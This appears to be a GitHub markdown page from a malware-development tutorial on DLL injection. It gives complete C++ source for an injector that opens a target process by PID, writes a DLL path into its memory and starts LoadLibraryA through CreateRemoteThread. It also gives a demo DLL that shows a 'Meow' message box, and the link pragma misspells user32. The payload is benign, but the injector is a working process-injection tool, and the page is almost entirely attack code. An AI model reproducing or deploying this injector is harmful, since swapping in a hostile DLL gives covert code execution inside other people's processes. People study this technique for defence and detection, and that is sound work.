Skip to content

Latest commit

 

History

History
71 lines (55 loc) · 2.11 KB

DLL injection.md

File metadata and controls

71 lines (55 loc) · 2.11 KB

It takes the process identifier as command line input and get a handle to the process and writes the DLL into it.

Sequence of APIs : OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread

The dll just opens a messagebox.

evil_inj.cpp

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <tlhelp32.h>

char evilDLL[] = "C:\\evil.dll";

unsigned int evilLen = sizeof(evilDLL) + 1;

int main(int argc, char* argv[]){
    HANDLE ph;
    HANDLE rt;
    LPVOID rb;

    HMODULE hKernel32 = GetModuleHandle("Kernel32");
    FARPROC lb = GetProcAddress(hKernel32, "LoadLibraryA");

    if(atoi(argv[1]) == 0){
        printf("PID not found :( exiting...\n");
        return -1;
    }

    printf("PID : %i", atoi(argv[1]));
    ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));

    rb = VirtualAllocEx(ph, NULL, evilLen, (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE);

    WriteProcessMemory(ph, rb, evilDLL, evilLen, NULL);

    rt = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)lb, rb, 0, NULL);
    CloseHandle(ph);
    return 0;
}

evil.cpp(DLL)

#include <windows.h>
#pragma comment (lib, "uesr32.lib")

BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved){
    switch (nReason){
        case DLL_PROCESS_ATTACH:
            MessageBox(
                NULL,
                "Meow from evil.dll",
                "=^..^=",
                MB_OK
            );
            break;
        case DLL_PROCESS_DETACH:
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}